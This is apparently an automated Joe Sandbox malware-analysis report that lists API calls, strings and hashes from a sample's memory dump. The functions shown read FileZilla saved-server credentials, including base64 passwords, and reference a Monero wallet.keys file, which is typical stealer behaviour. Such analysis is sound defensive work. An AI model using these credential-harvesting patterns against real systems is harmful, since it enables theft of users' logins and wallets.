Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: ExitInfoProcessSystem
String ID:
API String ID: 752954902-0
Opcode ID: 7add5630da3dd35a52eccf2164b45f63469327b02ffa2b109299aba24c113ff4
Instruction ID: 30ab1704c5b5cebe547aa52b510930fcc8d11948866e2bccc692dd1c3e8e7d09
Opcode Fuzzy Hash: 7add5630da3dd35a52eccf2164b45f63469327b02ffa2b109299aba24c113ff4
Instruction Fuzzy Hash: A4D0677490420D9BCB04ABA0998DA9DBB78FB0C615F101556D905A2340EA3169968AA6

Function 00999C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(76F70000,015663E8), ref: 00999C2D
GetProcAddress.KERNEL32(76F70000,01566228), ref: 00999C45
GetProcAddress.KERNEL32(76F70000,015798A0), ref: 00999C5E
GetProcAddress.KERNEL32(76F70000,015798D0), ref: 00999C76
GetProcAddress.KERNEL32(76F70000,0157C130), ref: 00999C8E
GetProcAddress.KERNEL32(76F70000,0157C268), ref: 00999CA7
GetProcAddress.KERNEL32(76F70000,0156A850), ref: 00999CBF
GetProcAddress.KERNEL32(76F70000,0157C0A0), ref: 00999CD7
GetProcAddress.KERNEL32(76F70000,0157C148), ref: 00999CF0
GetProcAddress.KERNEL32(76F70000,0157C160), ref: 00999D08
GetProcAddress.KERNEL32(76F70000,0157C190), ref: 00999D20
GetProcAddress.KERNEL32(76F70000,01566348), ref: 00999D39
GetProcAddress.KERNEL32(76F70000,01566428), ref: 00999D51
GetProcAddress.KERNEL32(76F70000,015664E8), ref: 00999D69
GetProcAddress.KERNEL32(76F70000,01566568), ref: 00999D82
GetProcAddress.KERNEL32(76F70000,0157C0B8), ref: 00999D9A
GetProcAddress.KERNEL32(76F70000,0157C2F8), ref: 00999DB2
GetProcAddress.KERNEL32(76F70000,0156A878), ref: 00999DCB
GetProcAddress.KERNEL32(76F70000,01566368), ref: 00999DE3
GetProcAddress.KERNEL32(76F70000,0157C1D8), ref: 00999DFB
GetProcAddress.KERNEL32(76F70000,0157C2C8), ref: 00999E14
GetProcAddress.KERNEL32(76F70000,0157C088), ref: 00999E2C
GetProcAddress.KERNEL32(76F70000,0157C0E8), ref: 00999E44
GetProcAddress.KERNEL32(76F70000,01566388), ref: 00999E5D
GetProcAddress.KERNEL32(76F70000,0157C2E0), ref: 00999E75
GetProcAddress.KERNEL32(76F70000,0157C340), ref: 00999E8D
GetProcAddress.KERNEL32(76F70000,0157C310), ref: 00999EA6
GetProcAddress.KERNEL32(76F70000,0157C1F0), ref: 00999EBE
GetProcAddress.KERNEL32(76F70000,0157C328), ref: 00999ED6
GetProcAddress.KERNEL32(76F70000,0157C358), ref: 00999EEF
GetProcAddress.KERNEL32(76F70000,0157C220), ref: 00999F07
GetProcAddress.KERNEL32(76F70000,0157C208), ref: 00999F1F
GetProcAddress.KERNEL32(76F70000,0157C070), ref: 00999F38
GetProcAddress.KERNEL32(76F70000,0157CC68), ref: 00999F50
GetProcAddress.KERNEL32(76F70000,0157C118), ref: 00999F68
GetProcAddress.KERNEL32(76F70000,0157C280), ref: 00999F81
GetProcAddress.KERNEL32(76F70000,01566588), ref: 00999F99
GetProcAddress.KERNEL32(76F70000,0157C0D0), ref: 00999FB1
GetProcAddress.KERNEL32(76F70000,015663A8), ref: 00999FCA
GetProcAddress.KERNEL32(76F70000,0157C178), ref: 00999FE2
GetProcAddress.KERNEL32(76F70000,0157C298), ref: 00999FFA
GetProcAddress.KERNEL32(76F70000,015663C8), ref: 0099A013
GetProcAddress.KERNEL32(76F70000,01566468), ref: 0099A02B
LoadLibraryA.KERNEL32(0157C100,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A03D
LoadLibraryA.KERNEL32(0157C238,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A04E
LoadLibraryA.KERNEL32(0157C1A8,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A060
LoadLibraryA.KERNEL32(0157C1C0,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A072
LoadLibraryA.KERNEL32(0157C250,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A083
LoadLibraryA.KERNEL32(0157C2B0,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A095
LoadLibraryA.KERNEL32(0157C430,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A0A7
LoadLibraryA.KERNEL32(0157C520,?,00995CA3,009A0AEB,?,?,?,?,?,?,?,?,?,?,009A0AEA,009A0AE3), ref: 0099A0B8
GetProcAddress.KERNEL32(75840000,015665C8), ref: 0099A0DA
GetProcAddress.KERNEL32(75840000,0157C598), ref: 0099A0F2
GetProcAddress.KERNEL32(75840000,01579428), ref: 0099A10A
GetProcAddress.KERNEL32(75840000,0157C5F8), ref: 0099A123
GetProcAddress.KERNEL32(75840000,01566708), ref: 0099A13B
GetProcAddress.KERNEL32(73C10000,0156A990), ref: 0099A160
GetProcAddress.KERNEL32(73C10000,01566648), ref: 0099A179
GetProcAddress.KERNEL32(73C10000,0156AAA8), ref: 0099A191
GetProcAddress.KERNEL32(73C10000,0157C580), ref: 0099A1A9
GetProcAddress.KERNEL32(73C10000,0157C5B0), ref: 0099A1C2
GetProcAddress.KERNEL32(73C10000,015665A8), ref: 0099A1DA
GetProcAddress.KERNEL32(73C10000,01566688), ref: 0099A1F2
GetProcAddress.KERNEL32(73C10000,0157C418), ref: 0099A20B
GetProcAddress.KERNEL32(760B0000,015666E8), ref: 0099A22C
GetProcAddress.KERNEL32(760B0000,015667E8), ref: 0099A244
GetProcAddress.KERNEL32(760B0000,0157C3B8), ref: 0099A25D
GetProcAddress.KERNEL32(760B0000,0157C628), ref: 0099A275
GetProcAddress.KERNEL32(760B0000,01566748), ref: 0099A28D
GetProcAddress.KERNEL32(75D30000,0156A6E8), ref: 0099A2B3
GetProcAddress.KERNEL32(75D30000,0156AAD0), ref: 0099A2CB
GetProcAddress.KERNEL32(75D30000,0157C448), ref: 0099A2E3
GetProcAddress.KERNEL32(75D30000,01566948), ref: 0099A2FC
GetProcAddress.KERNEL32(75D30000,015665E8), ref: 0099A314
GetProcAddress.KERNEL32(75D30000,0156A8C8), ref: 0099A32C
GetProcAddress.KERNEL32(753A0000,0157C5C8), ref: 0099A352
GetProcAddress.KERNEL32(753A0000,01566608), ref: 0099A36A
GetProcAddress.KERNEL32(753A0000,01579438), ref: 0099A382
GetProcAddress.KERNEL32(753A0000,0157C3A0), ref: 0099A39B
GetProcAddress.KERNEL32(753A0000,0157C3D0), ref: 0099A3B3
GetProcAddress.KERNEL32(753A0000,01566848), ref: 0099A3CB
GetProcAddress.KERNEL32(753A0000,01566628), ref: 0099A3E4
GetProcAddress.KERNEL32(753A0000,0157C5E0), ref: 0099A3FC
GetProcAddress.KERNEL32(753A0000,0157C508), ref: 0099A414
GetProcAddress.KERNEL32(76DA0000,015666C8), ref: 0099A436
GetProcAddress.KERNEL32(76DA0000,0157C610), ref: 0099A44E
GetProcAddress.KERNEL32(76DA0000,0157C4D8), ref: 0099A466
GetProcAddress.KERNEL32(76DA0000,0157C640), ref: 0099A47F
GetProcAddress.KERNEL32(76DA0000,0157C658), ref: 0099A497
GetProcAddress.KERNEL32(77300000,01566728), ref: 0099A4B8
GetProcAddress.KERNEL32(77300000,01566888), ref: 0099A4D1
GetProcAddress.KERNEL32(767E0000,015667A8), ref: 0099A4F2
GetProcAddress.KERNEL32(767E0000,0157C388), ref: 0099A50A
GetProcAddress.KERNEL32(6F6A0000,01566768), ref: 0099A530
GetProcAddress.KERNEL32(6F6A0000,01566788), ref: 0099A548
GetProcAddress.KERNEL32(6F6A0000,015668C8), ref: 0099A560
GetProcAddress.KERNEL32(6F6A0000,0157C400), ref: 0099A579
GetProcAddress.KERNEL32(6F6A0000,01566908), ref: 0099A591
GetProcAddress.KERNEL32(6F6A0000,015667C8), ref: 0099A5A9
GetProcAddress.KERNEL32(6F6A0000,01566808), ref: 0099A5C2
GetProcAddress.KERNEL32(6F6A0000,01566668), ref: 0099A5DA
GetProcAddress.KERNEL32(6F6A0000,InternetSetOptionA), ref: 0099A5F1
GetProcAddress.KERNEL32(6F6A0000,HttpQueryInfoA), ref: 0099A607
GetProcAddress.KERNEL32(75760000,0157C4F0), ref: 0099A629
GetProcAddress.KERNEL32(75760000,015794F8), ref: 0099A641
GetProcAddress.KERNEL32(75760000,0157C4A8), ref: 0099A659
GetProcAddress.KERNEL32(75760000,0157C550), ref: 0099A672
GetProcAddress.KERNEL32(762C0000,01566928), ref: 0099A693
GetProcAddress.KERNEL32(70000000,0157C460), ref: 0099A6B4
GetProcAddress.KERNEL32(70000000,01566828), ref: 0099A6CD
GetProcAddress.KERNEL32(70000000,0157C4C0), ref: 0099A6E5
GetProcAddress.KERNEL32(70000000,0157C568), ref: 0099A6FD

Strings

HttpQueryInfoA, xrefs: 0099A5FC
InternetSetOptionA, xrefs: 0099A5E5

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: HttpQueryInfoA$InternetSetOptionA
API String ID: 2238633743-1775429166
Opcode ID: 201922c7f9dc497778dd97bc912b6c898207624216352e9890defbcd35a8916b
Instruction ID: 8ce9f05f008d76138b4ff81f97b59e962430c6ec27f087b28560b1635db89aeb
Opcode Fuzzy Hash: 201922c7f9dc497778dd97bc912b6c898207624216352e9890defbcd35a8916b
Instruction Fuzzy Hash: DE622AB6600208AFC344DFA8FD98D663BF9F78C709714851BA609C3264DE39A851DF67

Function 00987710 Relevance: 81.6, APIs: 54, Instructions: 584
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00987724
RtlAllocateHeap.NTDLL(00000000), ref: 0098772B
lstrcat.KERNEL32(?,0157A190), ref: 009878DB
lstrcat.KERNEL32(?,?), ref: 009878EF
lstrcat.KERNEL32(?,?), ref: 00987903
lstrcat.KERNEL32(?,?), ref: 00987917
lstrcat.KERNEL32(?,0157DC90), ref: 0098792B
lstrcat.KERNEL32(?,0157DDF8), ref: 0098793F
lstrcat.KERNEL32(?,0157DD38), ref: 00987952
lstrcat.KERNEL32(?,0157DE28), ref: 00987966
lstrcat.KERNEL32(?,0157E060), ref: 0098797A
lstrcat.KERNEL32(?,?), ref: 0098798E
lstrcat.KERNEL32(?,?), ref: 009879A2
lstrcat.KERNEL32(?,?), ref: 009879B6
lstrcat.KERNEL32(?,0157DC90), ref: 009879C9
lstrcat.KERNEL32(?,0157DDF8), ref: 009879DD
lstrcat.KERNEL32(?,0157DD38), ref: 009879F1
lstrcat.KERNEL32(?,0157DE28), ref: 00987A04
lstrcat.KERNEL32(?,0157E0C8), ref: 00987A18
lstrcat.KERNEL32(?,?), ref: 00987A2C
lstrcat.KERNEL32(?,?), ref: 00987A40
lstrcat.KERNEL32(?,?), ref: 00987A54
lstrcat.KERNEL32(?,0157DC90), ref: 00987A68
lstrcat.KERNEL32(?,0157DDF8), ref: 00987A7B
lstrcat.KERNEL32(?,0157DD38), ref: 00987A8F
lstrcat.KERNEL32(?,0157DE28), ref: 00987AA3
lstrcat.KERNEL32(?,0157E130), ref: 00987AB6
lstrcat.KERNEL32(?,?), ref: 00987ACA
lstrcat.KERNEL32(?,?), ref: 00987ADE
lstrcat.KERNEL32(?,?), ref: 00987AF2
lstrcat.KERNEL32(?,0157DC90), ref: 00987B06
lstrcat.KERNEL32(?,0157DDF8), ref: 00987B1A
lstrcat.KERNEL32(?,0157DD38), ref: 00987B2D
lstrcat.KERNEL32(?,0157DE28), ref: 00987B41
lstrcat.KERNEL32(?,0157E198), ref: 00987B55
lstrcat.KERNEL32(?,?), ref: 00987B69
lstrcat.KERNEL32(?,?), ref: 00987B7D
lstrcat.KERNEL32(?,?), ref: 00987B91
lstrcat.KERNEL32(?,0157DC90), ref: 00987BA4
lstrcat.KERNEL32(?,0157DDF8), ref: 00987BB8
lstrcat.KERNEL32(?,0157DD38), ref: 00987BCC
lstrcat.KERNEL32(?,0157DE28), ref: 00987BDF
lstrcat.KERNEL32(?,0157E200), ref: 00987BF3
lstrcat.KERNEL32(?,?), ref: 00987C07
lstrcat.KERNEL32(?,?), ref: 00987C1B
lstrcat.KERNEL32(?,?), ref: 00987C2F
lstrcat.KERNEL32(?,0157DC90), ref: 00987C43
lstrcat.KERNEL32(?,0157DDF8), ref: 00987C56
lstrcat.KERNEL32(?,0157DD38), ref: 00987C6A
lstrcat.KERNEL32(?,0157DE28), ref: 00987C7E

Part of subcall function 009875D0: lstrcat.KERNEL32(35987020,009A17FC), ref: 00987606
Part of subcall function 009875D0: lstrcat.KERNEL32(35987020,00000000), ref: 00987648
Part of subcall function 009875D0: lstrcat.KERNEL32(35987020, : ), ref: 0098765A
Part of subcall function 009875D0: lstrcat.KERNEL32(35987020,00000000), ref: 0098768F
Part of subcall function 009875D0: lstrcat.KERNEL32(35987020,009A1804), ref: 009876A0
Part of subcall function 009875D0: lstrcat.KERNEL32(35987020,00000000), ref: 009876D3
Part of subcall function 009875D0: lstrcat.KERNEL32(35987020,009A1808), ref: 009876ED
Part of subcall function 009875D0: task.LIBCPMTD ref: 009876FB

lstrcat.KERNEL32(?,0157E4D8), ref: 00987E0B
lstrcat.KERNEL32(?,0157D4C0), ref: 00987E1E
lstrlen.KERNEL32(35987020), ref: 00987E2B
lstrlen.KERNEL32(35987020), ref: 00987E3B

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heaplstrlen$AllocateProcesslstrcpytask
String ID:
API String ID: 928082926-0
Opcode ID: 0ca0fb8d9131a1f67b527d045858153a50f672306ed6741fb5397637ac7bbc2f
Instruction ID: 0625846897d4b57346c9c198776657b46ef3f8a997b24c8f7255cce201443591
Opcode Fuzzy Hash: 0ca0fb8d9131a1f67b527d045858153a50f672306ed6741fb5397637ac7bbc2f
Instruction Fuzzy Hash: F03220B2C10318ABCB15EBA0DC85EEA737CBB48705F044A98F219A3190EE75E785CF51

Function 00990250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0099A740: lstrcpy.KERNEL32(009A0E17,00000000), ref: 0099A788

Part of subcall function 00998DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00998E0B

Part of subcall function 0099A920: lstrcpy.KERNEL32(00000000,?), ref: 0099A972
Part of subcall function 0099A920: lstrcat.KERNEL32(00000000), ref: 0099A982

Part of subcall function 0099A8A0: lstrcpy.KERNEL32(?,009A0E17), ref: 0099A905

Part of subcall function 0099A9B0: lstrlen.KERNEL32(?,015792B8,?,\Monero\wallet.keys,009A0E17), ref: 0099A9C5
Part of subcall function 0099A9B0: lstrcpy.KERNEL32(00000000), ref: 0099AA04
Part of subcall function 0099A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0099AA12

Part of subcall function 0099A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0099A7E6

Part of subcall function 009899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009899EC
Part of subcall function 009899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00989A11
Part of subcall function 009899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00989A31
Part of subcall function 009899C0: ReadFile.KERNEL32(000000FF,?,00000000,0098148F,00000000), ref: 00989A5A
Part of subcall function 009899C0: LocalFree.KERNEL32(0098148F), ref: 00989A90
Part of subcall function 009899C0: CloseHandle.KERNEL32(000000FF), ref: 00989A9A

Part of subcall function 00998E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00998E52

GetProcessHeap.KERNEL32(00000000,000F423F,009A0DBA,009A0DB7,009A0DB6,009A0DB3), ref: 00990362
RtlAllocateHeap.NTDLL(00000000), ref: 00990369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00990385
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 00990393
StrStrA.SHLWAPI(00000000,<Port>), ref: 009903CF
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 009903DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00990419
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 00990427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00990463
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 00990475
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 00990502
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 0099051A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 00990532
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 0099054A
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00990562
lstrcat.KERNEL32(?,profile: null), ref: 00990571
lstrcat.KERNEL32(?,url: ), ref: 00990580
lstrcat.KERNEL32(?,00000000), ref: 00990593
lstrcat.KERNEL32(?,009A1678), ref: 009905A2
lstrcat.KERNEL32(?,00000000), ref: 009905B5
lstrcat.KERNEL32(?,009A167C), ref: 009905C4
lstrcat.KERNEL32(?,login: ), ref: 009905D3
lstrcat.KERNEL32(?,00000000), ref: 009905E6
lstrcat.KERNEL32(?,009A1688), ref: 009905F5
lstrcat.KERNEL32(?,password: ), ref: 00990604
lstrcat.KERNEL32(?,00000000), ref: 00990617
lstrcat.KERNEL32(?,009A1698), ref: 00990626
lstrcat.KERNEL32(?,009A169C), ref: 00990635
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009A0DB2), ref: 0099068E

Strings

login: , xrefs: 009905CA
<Host>, xrefs: 0099037C
<Port>, xrefs: 009903C6
<Pass encoding="base64">, xrefs: 0099045A
<User>, xrefs: 00990410
browser: FileZilla, xrefs: 00990559
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 009902A4
password: , xrefs: 009905FB
url: , xrefs: 00990577
profile: null, xrefs: 00990568

Memory Dump Source

Source File: 00000000.00000002.1590102211.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true

Associated: 00000000.00000002.1590081683.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.00000000009DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A08000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A0F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A12000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A3D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A62000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A6F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A8F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000A9E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B25000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590102211.0000000000B4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000BDE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000D67000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590525745.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590868041.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590983782.0000000001025000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591003407.0000000001026000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_980000_file.jbxd

Yara matches

Similarity

